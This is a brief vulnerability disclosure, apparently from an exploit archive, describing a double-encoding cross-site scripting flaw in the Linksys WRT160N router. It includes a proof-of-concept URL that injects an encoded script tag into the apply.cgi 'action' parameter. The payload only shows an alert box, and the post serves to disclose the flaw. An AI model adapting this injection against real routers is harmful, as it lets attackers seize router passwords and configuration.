**********************************************************************
*  Linksys WRT160N Wireless Router Double encoding XSS Vulnerability *
*							             *
*              By David Gil					     *
*						                     *
*       http://www.infosec.com.mx				     *
*					                             *
*          dagil@infosec.com.mx					     *
*								     *
**********************************************************************       



Using Double encoding attack you can inject XSS code into a HTTP POST request

a common user can be easily cheated and compromise router password or router configuration.



Proof of Concept:

http://192.168.1.1/apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15



Greetz:

Alex Hernandez